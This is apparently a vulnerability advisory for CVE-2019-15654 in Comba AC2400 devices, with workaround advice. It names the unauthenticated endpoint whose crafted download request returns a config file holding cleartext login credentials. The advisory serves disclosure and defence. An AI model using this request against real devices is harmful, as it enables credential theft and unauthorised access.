CVE-2019-15654

Name of the Vulnerable Software and Affected Versions Comba AC2400 devices (affected versions not specified)

Description The issue allows for password disclosure through a crafted request to the "/09/business/upgrade/upcfgAction.php?download=true" API endpoint. This request does not require authentication and results in the download of the DBconfig.cfg file, which stores login information in cleartext at the end of the file.

Recommendations For Comba AC2400 devices, as a temporary workaround, consider restricting access to the "/09/business/upgrade/upcfgAction.php" API endpoint until a patch is available. Avoid using this endpoint to download the DBconfig.cfg file until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.